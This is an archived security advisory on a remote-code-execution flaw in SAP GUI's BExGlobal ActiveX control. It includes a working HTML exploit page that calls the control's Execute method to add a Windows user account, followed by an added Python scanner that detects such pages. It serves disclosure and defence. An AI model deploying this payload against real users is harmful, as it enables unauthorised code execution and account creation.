
SAP GUI version 7.00 BExGlobal Active-X unsecure method

25 Mar 2010 | Reported by Alexey Sintsov | Type: zdt | Source: 0day.today

SAP GUI 7.00 BExGlobal Active-X unsecure method allows remote code execution

Code
=======================================================
SAP GUI version 7.00 BExGlobal Active-X unsecure method
=======================================================


A security vulnerability was found in SAP GUI 7.10 and BI 7.0 that allows operating system functions to be called remotely.
 
Application: SAP GUI
Versions Affected: SAP GUI (SAP GUI 7.1)
Vendor URL: http://SAP.com
Bugs: Insecure method. Code Execution.
Exploits: YES
Reported: 16.10.2009
Vendor response: 27.10.2009
Date of Public Advisory: 23.03.2010
Author: Alexey Sintsov from DSecRG
 
Description
***********
 
An insecure method was found in the SAPBExCommonResources (class BExGlobal) ActiveX control component, which is part of SAP GUI.
One of its methods (Execute) can be used to execute files on the user's system.
 
 
 
Details
*******
 
An attacker can construct an HTML page that calls the vulnerable function "Execute" of the ActiveX object BExGlobal.
 
 
 
Example (add user 'don_huan' with password 'p4ssW0rd'):
*******
 
 
<html>
<title>*DSecRG* Add user *DSecRG*</title>
<object classid="clsid:A009C90D-814B-11D3-BA3E-080009D22344" id='DH'></object>
 
<script language='Javascript'>
function init()
{
DH.Execute("net.exe","user don_huan p4ssW0rd /add","d:\\windows\\",1,"",1);
 
}
init();
</script>
DSecRG
</html>
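
For detection, pages that instantiate this control can be matched in proxy or mail-gateway content. The Python scanner below is an added example, not part of the original advisory: only the CLSID and the Execute method name come from the advisory, while the function names, class name and sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID of the BExGlobal control, taken from the advisory's example page.
BEXGLOBAL_CLSID = "a009c90d-814b-11d3-ba3e-080009d22344"
_CLSID_RE = re.compile(r"clsid:\s*\{?([0-9a-f-]{36})\}?")
# Constructed sample page (placeholder arguments), used only to exercise the scanner.
SAMPLE = ('<html><OBJECT CLASSID="CLSID:{A009C90D-814B-11D3-BA3E-080009D22344}" id="ctl">'
          '</OBJECT><script>ctl . Execute("PROGRAM","ARGS","DIR",1,"",1);</script></html>')

class _Collector(HTMLParser):
    """Collects ids of <object> tags bound to BExGlobal, plus inline script text."""
    def __init__(self):
        super().__init__()
        self.hit, self.ids, self.script, self._in_script = False, [], [], False

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
        elif tag == "object":
            # Tolerate upper case, surrounding spaces and the {GUID} form.
            m = _CLSID_RE.fullmatch(attrs.get("classid", "").strip().lower())
            if m and m.group(1) == BEXGLOBAL_CLSID:
                self.hit = True
                if attrs.get("id"):
                    self.ids.append(attrs["id"])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script.append(data)

def scan_html(html):
    """Return findings for one HTML document; an empty list means no match."""
    c = _Collector()
    c.feed(html)
    c.close()
    if not c.hit:
        return []
    findings = ["object tag instantiates the BExGlobal CLSID"]
    for oid in c.ids:
        # Flags <id>.Execute(...) only; indirect or obfuscated calls are not covered.
        if re.search(r"\b%s\s*\.\s*Execute\s*\(" % re.escape(oid), "\n".join(c.script), re.I):
            findings.append("script calls Execute on object id %r" % oid)
    return findings

if __name__ == "__main__":
    print(scan_html(SAMPLE))
```

The first finding alone (the object tag without a matching call) is still worth reviewing, since this scanner does not follow indirect references to the control.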



#  0day.today [2018-03-05]  #
